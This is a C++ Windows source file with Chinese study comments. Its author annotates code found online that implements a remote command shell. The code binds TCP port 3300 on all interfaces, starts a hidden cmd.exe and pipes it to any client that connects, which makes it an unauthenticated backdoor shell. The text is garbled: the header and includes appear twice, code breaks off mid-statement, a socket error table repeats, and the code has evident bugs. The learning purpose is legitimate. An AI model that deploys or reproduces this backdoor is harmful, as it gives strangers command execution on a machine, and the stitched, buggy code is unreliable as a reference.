// vctelnetserver.cpp : Defines the entry point for the console application.
//这是从网上找的代码,相当于从解读代码的角度来分析这个“利用匿名管道实现的远程CMD”来学习我们这周的内容咯
//也算是半个晚上的成果,牛掰大神们不要笑话某渣
//by 司空徵
#include "stdio.h"
#include <Winsock2.h>
#include <Windows.h>
#include <Winbase.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "kernel32.lib")
void main()
{
WSADATA zi;//该结构被用来储存调用AfxSocketInit全局函数返回的Windows Sockets初始化信息。
SOCKET telnetan;//TCP协议什么的telnet命令有关?!╮(╯_╰)╭
int pcport = 3300;
int ret;
if ((ret = WSAStartup(MAKEWORD(2,2),&zi)) != 0)//初始化差错报错系列
//windows初始化socket网络库申请2.2版本,从而使得高版本的Winsock可以使用
//winsock基础 如下
//http://wenku.baidu.com/link?url=Rvhc48n-iTPvXyndf2V-AyHd6pK39_H4ZQf8qlOd1Fkrb4NOmKC0Irf7uM6lXMDLM6iHsiP68-AVJiIrWHYNL4i5O3zDNNqdqKNfpo8hpbi
//这是从网上找的代码,相当于从解读代码的角度来分析这个“利用匿名管道实现的远程CMD”来学习我们这周的内容咯
//也算是半个晚上的成果,牛掰大神们不要笑话某渣
//by 司空徵
#include "stdio.h"
#include <Winsock2.h>
#include <Windows.h>
#include <Winbase.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "kernel32.lib")
void main()
{
WSADATA zi;//该结构被用来储存调用AfxSocketInit全局函数返回的Windows Sockets初始化信息。
SOCKET telnetan;//TCP协议什么的telnet命令有关?!╮(╯_╰)╭
int pcport = 3300;
int ret;
if ((ret = WSAStartup(MAKEWORD(2,2),&zi)) != 0)//初始化差错报错系列
//windows初始化socket网络库申请2.2版本,从而使得高版本的Winsock可以使用
//winsock基础 如下
//http://wenku.baidu.com/link?url=Rvhc48n-iTPvXyndf2V-AyHd6pK39_H4ZQf8qlOd1Fkrb4NOmKC0Irf7uM6lXMDLM6iHsiP68-AVJiIrWHYNL4i5O3zDNNqdqKNfpo8hpbi
{
printf("WSAStartup failed with error %d\n", ret);
return;
}
if ((telnetan = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)//如果socket被设置成无效套接字
{
printf("socket failed with error %d\n", WSAGetLastError());//从而使得高版本的Winsock可以使用
WSACleanup();
return;
}
SOCKADDR_IN telnet_server;
//sockaddr_in和sockaddr是并列的结构,指向sockaddr_in的结构体的指针也可以指向
//sockaddr的结构体,并代替它。也就是说,你可以使用sockaddr_in建立你所需要的信息,
telnet_server.sin_family = AF_INET;//Address family 一般来说 AF_INET(地址族)PF_INET(协议族 )
telnet_server.sin_port = htons(pcport);//Port number (必须要采用网络数据格式,普通数字可以用htons()函数转换成网络数据格式的数字)
telnet_server.sin_addr.s_addr = htonl(INADDR_ANY);// Internet address
if (bind(telnetan, (SOCKADDR *)&telnet_server, sizeof(telnet_server))== SOCKET_ERROR)
//bind()——将本端sockaddr_in(赋值后)强制转换成sockaddr 类型,绑定到socket 句柄上
{
printf("bind failed with error %d\n", WSAGetLastError());
closesocket(telnetan);
WSACleanup();
return;
}
if (listen(telnetan, 5) == SOCKET_ERROR)//末尾处有socket error一览表。。。原谅我的储物癖~\(≧▽≦)/~
{
printf("listen failed with error %d\n", WSAGetLastError());
closesocket(telnetan);
WSACleanup();
return;
}
int telnetsize=sizeof(telnet_server);
SOCKET clientaccept;
while (true)
{
if((clientaccept = accept(telnetan, (SOCKADDR *) &telnet_server,&telnetsize)) != INVALID_SOCKET)
{
//建立匿名管道
SECURITY_ATTRIBUTES pipeline1,pipeline2;
HANDLE hReadPipe,hWritePipe,hWriteFile,hReadFile;
pipeline1.nLength = sizeof(SECURITY_ATTRIBUTES);
pipeline1.lpSecurityDescriptor = NULL;
pipeline1.bInheritHandle = true;
if((ret = CreatePipe(&hReadPipe,&hWriteFile,&pipeline1,0)) = 0)
{
printf("建立cmd管道失败! ::d%",GetLastError());
WSACleanup();
}
pipeline2.nLength = sizeof(SECURITY_ATTRIBUTES);
pipeline2.lpSecurityDescriptor = NULL;
pipeline2.bInheritHandle = true;
if((ret = CreatePipe(&hReadFile,&hWritePipe,&pipeline2,0)) = 0)
{
printf("建立cmd管道失败! ::d%",GetLastError());
WSACleanup();
}
//进程结构体 CMD来啦~(~o ̄▽ ̄)~o ~。。。
STARTUPINFO cmdpos;
ZeroMemory(&cmdpos,sizeof(cmdpos));//将结构体里的所有成员初始值置为0
GetStartupInfo(&cmdpos);
cmdpos.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
cmdpos.wShowWindow = SW_HIDE;
cmdpos.hStdInput = hReadPipe;
cmdpos.hStdOutput = hWritePipe;
cmdpos.hStdError = hWritePipe;
PROCESS_INFORMATION processinformation;
//正式建立进程
char szAPP[256];
char recv_buff[1024];
char send_buff[1024];
DWORD nByteToWrite, nByteWritten,len;//至此 分享一个06的人写的“编程实现远程Shell的获取”
//http://hi.baidu.com/olhack/item/76aa411487891e0b8fbde40e
GetSystemDirectory(szAPP,MAX_PATH+1);
strcat(szAPP,"\\cmd.exe");
ret=CreateProcess(NULL,szAPP,NULL,NULL,1,0,NULL,NULL,&cmdpos,&processinformation);
//WIN32API函数CreateProcess用来创建一个新的进程和它的主线程,这个新进程运行指定的可执行文件
while(true)
{
ReadFile(hReadFile,send_buff,1024,&len,NULL);
send(clientaccept,send_buff,len,0);
printf("%s",send_buff);
Sleep(1);
nByteToWrite = recv(clientaccept,recv_buff,1024,0);
WriteFile(hWriteFile,recv_buff,nByteToWrite,&nByteWritten,NULL);
Sleep(1);
}
}
}
}
/*************************************socket错误一览***********************************************
Socket error 0 - Directly send error
Socket error 10004 - Interrupted function call
Socket error 10013 - Permission denied(权限被拒绝)
Socket error 10014 - Bad address
Socket error 10022 - Invalid argument
Socket error 10024 - Too many open files
Socket error 10035 - Resource temporarily unavailable
Socket error 10036 - Operation now in progress
Socket error 10037 - Operation already in progress
Socket error 10038 - Socket operation on non-socket
Socket error 10039 - Destination address required
Socket error 10040 - Message too long
Socket error 10041 - Protocol wrong type for socket
Socket error 10042 - Bad protocol option
Socket error 10043 - Protocol not supported
Socket error 10044 - Socket type not supported
Socket error 10045 - Operation not supported
Socket error 10046 - Protocol family not supported
Socket error 10047 - Address family not supported by protocol family
Socket error 10048 - Address already in use
Socket error 10049 - Cannot assign requested address
Socket error 10050 - Network is down
Socket error 10051 - Network is unreachable
Socket error 10052 - Network dropped connection on reset
Socket error 10053 - Software caused connection abort
Socket error 10054 - Connection reset by peer
Socket error 10055 - No buffer space available
Socket error 10056 - Socket is already connected
Socket error 10057 - Socket is not connected
Socket error 10058 - Cannot send after socket shutdown
Socket error 10060 - Connection timed out
Socket error 10061 - Connection refused
Socket error 10064 - Host is down
Socket error 10065 - No route to host
Socket error 10067 - Too many processes
Socket error 10091 - Network subsystem is unavailable
Socket error 10092 - WINSOCK.DLL version out of range
Socket error 10093 - Successful WSAStartup not yet performed
Socket error 10094 - Graceful shutdown in progress
Socket error 11001 - Host not found
Socket error 11002 - Non-authoritative host not found
Socket error 11003 - This is a non-recoverable error
Socket error 11004 - Valid name, no data record of requested type
WSAEADDRINUSE (10048) Address already in use
WSAECONNABORTED (10053) Software caused connection abort
WSAECONNREFUSED (10061) Connection refused
WSAECONNRESET (10054) Connection reset by peer
WSAEDESTADDRREQ (10039) Destination address required
WSAEHOSTUNREACH (10065) No route to host
WSAEMFILE (10024) Too many open files
WSAENETDOWN (10050) Network is down
WSAENETRESET (10052) Network dropped connection
WSAENOBUFS (10055) No buffer space available
WSAENETUNREACH (10051) Network is unreachable
WSAETIMEDOUT (10060) Connection timed out
WSAHOST_NOT_FOUND (11001) Host not found
WSASYSNOTREADY (10091) Network sub-system is unavailable
WSANOTINITIALISED (10093) WSAStartup() not performed
WSANO_DATA (11004) Valid name, no data of that type
WSANO_RECOVERY (11003) Non-recoverable query error
WSATRY_AGAIN (11002) Non-authoritative host found
WSAVERNOTSUPPORTED (10092) Wrong WinSock DLL version
************************************socket错误一览***********************************************/
}
}
}
/*************************************socket错误一览***********************************************
Socket error 0 - Directly send error
Socket error 10004 - Interrupted function call
Socket error 10013 - Permission denied(权限被拒绝)
Socket error 10014 - Bad address
Socket error 10022 - Invalid argument
Socket error 10024 - Too many open files
Socket error 10035 - Resource temporarily unavailable
Socket error 10036 - Operation now in progress
Socket error 10037 - Operation already in progress
Socket error 10038 - Socket operation on non-socket
Socket error 10039 - Destination address required
Socket error 10040 - Message too long
Socket error 10041 - Protocol wrong type for socket
Socket error 10042 - Bad protocol option
Socket error 10043 - Protocol not supported
Socket error 10044 - Socket type not supported
Socket error 10045 - Operation not supported
Socket error 10046 - Protocol family not supported
Socket error 10047 - Address family not supported by protocol family
Socket error 10048 - Address already in use
Socket error 10049 - Cannot assign requested address
Socket error 10050 - Network is down
Socket error 10051 - Network is unreachable
Socket error 10052 - Network dropped connection on reset
Socket error 10053 - Software caused connection abort
Socket error 10054 - Connection reset by peer
Socket error 10055 - No buffer space available
Socket error 10056 - Socket is already connected
Socket error 10057 - Socket is not connected
Socket error 10058 - Cannot send after socket shutdown
Socket error 10060 - Connection timed out
Socket error 10061 - Connection refused
Socket error 10064 - Host is down
Socket error 10065 - No route to host
Socket error 10067 - Too many processes
Socket error 10091 - Network subsystem is unavailable
Socket error 10092 - WINSOCK.DLL version out of range
Socket error 10093 - Successful WSAStartup not yet performed
Socket error 10094 - Graceful shutdown in progress
Socket error 11001 - Host not found
Socket error 11002 - Non-authoritative host not found
Socket error 11003 - This is a non-recoverable error
Socket error 11004 - Valid name, no data record of requested type
WSAEADDRINUSE (10048) Address already in use
WSAECONNABORTED (10053) Software caused connection abort
WSAECONNREFUSED (10061) Connection refused
WSAECONNRESET (10054) Connection reset by peer
WSAEDESTADDRREQ (10039) Destination address required
WSAEHOSTUNREACH (10065) No route to host
WSAEMFILE (10024) Too many open files
WSAENETDOWN (10050) Network is down
WSAENETRESET (10052) Network dropped connection
WSAENOBUFS (10055) No buffer space available
WSAENETUNREACH (10051) Network is unreachable
WSAETIMEDOUT (10060) Connection timed out
WSAHOST_NOT_FOUND (11001) Host not found
WSASYSNOTREADY (10091) Network sub-system is unavailable
WSANOTINITIALISED (10093) WSAStartup() not performed
WSANO_DATA (11004) Valid name, no data of that type
WSANO_RECOVERY (11003) Non-recoverable query error
WSATRY_AGAIN (11002) Non-authoritative host found
WSAVERNOTSUPPORTED (10092) Wrong WinSock DLL version
************************************socket错误一览***********************************************/